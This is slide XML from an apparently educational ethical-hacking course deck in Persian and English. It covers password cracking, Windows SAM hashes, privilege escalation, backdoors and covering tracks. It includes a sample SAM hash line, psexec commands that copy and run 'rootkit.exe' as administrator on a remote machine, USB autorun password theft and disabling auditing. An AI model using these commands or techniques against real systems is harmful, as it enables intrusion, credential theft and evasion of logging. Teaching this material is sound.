            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Distributed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Network Attacks (DNA)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Simply, using distributed machines. Like SETI@Home</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Default Passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>USB Automated Password Theft (autorunning pspv.exe on windows)</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5"/>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Password cracking 4/4</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31" name="Google Shape;331;p55"/>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Security Accounts Manager (SAM)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File at system32\config\SAM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using LM/NTML hashing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SYSKEY encrypts the SAM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>There is always a file lock on SAM while the windows is running</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Link:1010:624AAC413795CDC14E835F1CD90F4C76:6F585FF8FF6280B59CCE252FDB500EB8:::</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Check page 304</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kerberos (after win 2000), page 305</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Password Reset via physical access (chntpw - bootable, mounting, …)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Non Electronic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Recovery systems</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Social Engineering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gettings the password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gaining access to reset, keylogger, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Solution? EDUCATION</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هک اخلاقی </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>اصطلاح ها</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="243725"/>
            <a:ext cx="4537500" cy="4194000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>تاریخچه و وضع فعلی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>رنگ کلاه ها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>انواع هک ها (بلک باکس، گری باکس و وایت باکس)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hack Value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerability (Weakness)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploit (successful attack, execution)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Zero Day</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pivoting (Daisy Chaning)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Doxing  (Publishing Personal Identifieable Info)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bot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56"/>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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Escalation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37" name="Google Shape;337;p56"/>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Horizontal -&gt; another user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vertical -&gt; gain more access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Password change</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Active@ Password changer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trinity Rescue Kit (TRK)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ERD Commander</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Windows Recovery Env (WinRE)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Password Resetter</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7"/>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Execurint Applications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43" name="Google Shape;343;p57"/>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If you can run apps, you’ve “owned” the system</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Backdoors (will giver you access later)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trojans</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Remote Access Trojans (RAT)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A famous one is “PsTools”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Only needs copying and running</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sexec \\zelda cmd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sexec \\zelda -c rootkit.exe #copy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sexec \\zelda -u administrator \c rootkit.exe #copy and execute</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Another sample is “DameWare”, PDQDeploy, RemoteExec, Netcat</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Crackers; to crack more passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Keyloggers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</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8"/>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Covering Tracks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49" name="Google Shape;349;p58"/>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Most Recent Used (MRUs)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>On windows you can Disable auditing:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
